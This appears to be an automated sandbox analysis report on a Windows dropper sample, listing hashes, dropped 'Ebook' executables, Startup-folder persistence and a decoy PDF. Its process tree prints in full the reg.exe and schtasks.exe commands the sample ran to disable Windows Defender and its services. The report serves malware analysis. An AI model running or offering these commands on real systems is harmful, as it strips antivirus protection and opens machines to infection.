Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
17-11-2020 14:09
Static task
static1
Behavioral task
behavioral1
Sample
b4f13d994a6ecd0853ffae7794afdb36.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
b4f13d994a6ecd0853ffae7794afdb36.exe
Resource
win10v20201028
General
-
Target
b4f13d994a6ecd0853ffae7794afdb36.exe
-
Size
15.0MB
-
MD5
d8b28c55bf7cc4a07a1766b33109e82b
-
SHA1
03ba66c56ca18bcecd078aeb9558825062157403
-
SHA256
13540d62324d40e8b15db72f32fdf1eb407f4f4d9c4cac05d5f436c39a000df2
-
SHA512
2654e24a3d2a23b8f004d32cc809fc4826fba7d59eb13889f2cc0e1f5df967fa91bf38873f1d555da62e427dde47adfd8231e91d62a0a55195858fc01fab22b6
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
EbookReaderMui.exeEbookRplg.exeEbookNplg.exepid process 2812 EbookReaderMui.exe 3740 EbookRplg.exe 4000 EbookNplg.exe -
Drops startup file 4 IoCs
Processes:
EbookNplg.exeEbookRplg.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe EbookNplg.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe EbookNplg.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe EbookRplg.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe EbookRplg.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv reg.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
b4f13d994a6ecd0853ffae7794afdb36.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings b4f13d994a6ecd0853ffae7794afdb36.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
Processes:
EbookNplg.exeEbookRplg.exeAcroRd32.exepid process 4000 EbookNplg.exe 3740 EbookRplg.exe 4000 EbookNplg.exe 3740 EbookRplg.exe 4000 EbookNplg.exe 4000 EbookNplg.exe 4000 EbookNplg.exe 4000 EbookNplg.exe 4000 EbookNplg.exe 4000 EbookNplg.exe 4000 EbookNplg.exe 4000 EbookNplg.exe 3740 EbookRplg.exe 3740 EbookRplg.exe 3740 EbookRplg.exe 3740 EbookRplg.exe 3740 EbookRplg.exe 3740 EbookRplg.exe 3740 EbookRplg.exe 3740 EbookRplg.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
EbookNplg.exeEbookRplg.exedescription pid process Token: SeDebugPrivilege 4000 EbookNplg.exe Token: SeDebugPrivilege 3740 EbookRplg.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 200 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
EbookReaderMui.exeAcroRd32.exepid process 2812 EbookReaderMui.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe 200 AcroRd32.exe -
Suspicious use of WriteProcessMemory 327 IoCs
Processes:
b4f13d994a6ecd0853ffae7794afdb36.exeEbookReaderMui.execmd.exedescription pid process target process PID 4040 wrote to memory of 2812 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookReaderMui.exe PID 4040 wrote to memory of 2812 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookReaderMui.exe PID 4040 wrote to memory of 2812 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookReaderMui.exe PID 4040 wrote to memory of 3740 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookRplg.exe PID 4040 wrote to memory of 3740 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookRplg.exe PID 4040 wrote to memory of 3740 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookRplg.exe PID 4040 wrote to memory of 4000 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookNplg.exe PID 4040 wrote to memory of 4000 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookNplg.exe PID 4040 wrote to memory of 4000 4040 b4f13d994a6ecd0853ffae7794afdb36.exe EbookNplg.exe PID 4040 wrote to memory of 200 4040 b4f13d994a6ecd0853ffae7794afdb36.exe AcroRd32.exe PID 4040 wrote to memory of 200 4040 b4f13d994a6ecd0853ffae7794afdb36.exe AcroRd32.exe PID 4040 wrote to memory of 200 4040 b4f13d994a6ecd0853ffae7794afdb36.exe AcroRd32.exe PID 2812 wrote to memory of 2004 2812 EbookReaderMui.exe cmd.exe PID 2812 wrote to memory of 2004 2812 EbookReaderMui.exe cmd.exe PID 2004 wrote to memory of 1512 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1512 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3624 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3624 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1180 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1180 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3936 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3936 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2512 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2512 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2924 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2924 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3996 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3996 2004 cmd.exe reg.exe PID 2004 wrote to memory of 4056 2004 cmd.exe reg.exe PID 2004 wrote to memory of 4056 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1352 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1352 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2808 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2808 2004 cmd.exe reg.exe PID 2004 wrote to memory of 732 2004 cmd.exe reg.exe PID 2004 wrote to memory of 732 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1340 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1340 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2652 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2652 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3912 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3912 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2456 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2456 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2924 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 2924 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 4056 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 4056 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 3376 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 3376 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 1380 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 1380 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 3892 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 3892 2004 cmd.exe schtasks.exe PID 2004 wrote to memory of 2508 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2508 2004 cmd.exe reg.exe PID 2004 wrote to memory of 4056 2004 cmd.exe reg.exe PID 2004 wrote to memory of 4056 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1368 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1368 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3976 2004 cmd.exe reg.exe PID 2004 wrote to memory of 3976 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1512 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1512 2004 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4f13d994a6ecd0853ffae7794afdb36.exe"C:\Users\Admin\AppData\Local\Temp\b4f13d994a6ecd0853ffae7794afdb36.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3C63.tmp\3C64.tmp\3C65.bat C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies service
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies service
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies service
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies service
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies service
-
C:\Users\Admin\AppData\Roaming\EbookRplg.exe"C:\Users\Admin\AppData\Roaming\EbookRplg.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\EbookNplg.exe"C:\Users\Admin\AppData\Roaming\EbookNplg.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=79BA6ADFFBB39D4D6873DC1F516B233E --mojo-platform-channel-handle=1636 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=60DDD6F7A6010F68307DC73066E0102A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=60DDD6F7A6010F68307DC73066E0102A --renderer-client-id=2 --mojo-platform-channel-handle=1648 --allow-no-sandbox-job /prefetch:14⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0D646FE9FCA8661FD3ABD688504FC120 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0D646FE9FCA8661FD3ABD688504FC120 --renderer-client-id=4 --mojo-platform-channel-handle=2068 --allow-no-sandbox-job /prefetch:14⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2ECA88EDC3E943D70E59A160836B8248 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=76E143AC8485DC7DF4AC8F7AC5150725 --mojo-platform-channel-handle=2608 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F06ADB2F2B00EEF405D67FF5B9B83E13 --mojo-platform-channel-handle=1924 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3C63.tmp\3C64.tmp\3C65.batMD5
665f21a9b6730aa08e62473e481b8c55
SHA1717d52e75ac16bf032299828dd61c86af281eb43
SHA256dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e
-
C:\Users\Admin\AppData\Roaming\EbookNplg.exeMD5
34a185bb131df034d21df734a479818d
SHA146e8c775b5224e78769753c70731e7e2ad6022f2
SHA256bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11
SHA512eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41
-
C:\Users\Admin\AppData\Roaming\EbookNplg.exeMD5
34a185bb131df034d21df734a479818d
SHA146e8c775b5224e78769753c70731e7e2ad6022f2
SHA256bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11
SHA512eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41
-
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exeMD5
9684ab1ebcc8844fbbffd54b3b8e5db1
SHA11fbbca3f9e063ce98cde453e1b820e056a524771
SHA256c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec
SHA512b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df
-
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exeMD5
9684ab1ebcc8844fbbffd54b3b8e5db1
SHA11fbbca3f9e063ce98cde453e1b820e056a524771
SHA256c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec
SHA512b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df
-
C:\Users\Admin\AppData\Roaming\EbookRplg.exeMD5
27a3654950322a5d1d601ebd25a3dfa2
SHA1021b03d043ef146920a137550bb731c545061c6a
SHA256876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b
SHA51276a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3
-
C:\Users\Admin\AppData\Roaming\EbookRplg.exeMD5
27a3654950322a5d1d601ebd25a3dfa2
SHA1021b03d043ef146920a137550bb731c545061c6a
SHA256876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b
SHA51276a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3
-
C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdfMD5
fba5105a8c3d44d986eccd5f50afa10c
SHA196c6ca621f300db6f5b0c031427706ed3600ee43
SHA256a20407d4bf88efde6f231a7d0b1e5d8797b7a4b2f2f77fbc779eaf922649b37c
SHA512f85288408d0a9b14102ac82615cb9f8aa852abab992116fdfbf13695a9028f6c37d0be29aeea0f6df430cb01f084ab8dd3416ec24e1276811dc9143119c57130
-
memory/200-8-0x0000000000000000-mapping.dmp
-
memory/732-39-0x0000000000000000-mapping.dmp
-
memory/1180-31-0x0000000000000000-mapping.dmp
-
memory/1340-40-0x0000000000000000-mapping.dmp
-
memory/1352-37-0x0000000000000000-mapping.dmp
-
memory/1368-55-0x0000000000000000-mapping.dmp
-
memory/1380-51-0x0000000000000000-mapping.dmp
-
memory/1512-20-0x0000000000000000-mapping.dmp
-
